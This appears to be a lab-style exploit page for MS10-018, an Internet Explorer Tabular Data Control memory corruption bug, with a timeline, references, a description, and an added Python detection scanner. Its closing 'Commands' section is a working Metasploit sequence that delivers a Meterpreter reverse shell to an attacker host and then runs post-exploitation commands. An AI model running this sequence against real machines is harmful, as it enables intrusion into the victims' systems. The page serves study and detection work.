MS10-018 : Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption

Timeline :

Vulnerability privately disclosed to Microsoft by ZDI on 2009-10-20
Microsoft patch “KB980182” released on 2010-03-30
Metasploit PoC provided by jduck on 2010-04-05

PoC provided by :

Anonymous
jduck

Reference(s) :

CVE-2010-0805
MS10-018

Affected version(s) :

Internet Explorer 5
Internet Explorer 6

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB980182

Description :

This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that versions 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the “DataURL” parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.
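As an added detection example (not part of the original page or of the Metasploit module), the scanner below flags HTML that instantiates the Tabular Data Control with an overlong DataURL parameter, which is the trigger condition the description above names. The CLSID is assumed to be the control's registered CLSID and the length threshold is a heuristic chosen here; both are assumptions, not values from the page.

```python
from html.parser import HTMLParser

# Assumption: registered CLSID of the Tabular Data Control (not stated on the page).
TDC_CLSID = "333c7bc4-460f-11d0-bc04-0080c7055a83"
# Heuristic threshold: a legitimate DataURL is a short path or URL.
MAX_DATAURL_LEN = 1024


class TdcScanner(HTMLParser):
    """Collects the lengths of overlong DataURL params inside TDC <object> tags."""

    def __init__(self):
        super().__init__()
        self._in_tdc = False
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "object":
            classid = (a.get("classid") or "").strip().lower()
            classid = classid.replace("clsid:", "").strip("{}")
            self._in_tdc = classid == TDC_CLSID
        elif tag == "param" and self._in_tdc:
            if (a.get("name") or "").strip().lower() == "dataurl":
                value = a.get("value") or ""
                if len(value) > MAX_DATAURL_LEN:
                    self.findings.append(len(value))

    def handle_endtag(self, tag):
        if tag == "object":
            self._in_tdc = False


def scan_html(html):
    """Return the lengths of every overlong DataURL found; empty list means clean."""
    scanner = TdcScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples: a normal TDC use and one with an oversized DataURL.
BENIGN_HTML = ('<object id="tdc" classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">'
               '<param name="DataURL" value="data.csv"></object>')
SUSPECT_HTML = ('<object classid="CLSID:{333C7BC4-460F-11D0-BC04-0080C7055A83}">'
                '<param name="dataurl" value="' + "A" * 4096 + '"></object>')

if __name__ == "__main__":
    print("benign:", scan_html(BENIGN_HTML), "suspect:", scan_html(SUSPECT_HTML))
```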

Commands :

use windows/browser/ms10_018_ie_tabular_activex
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig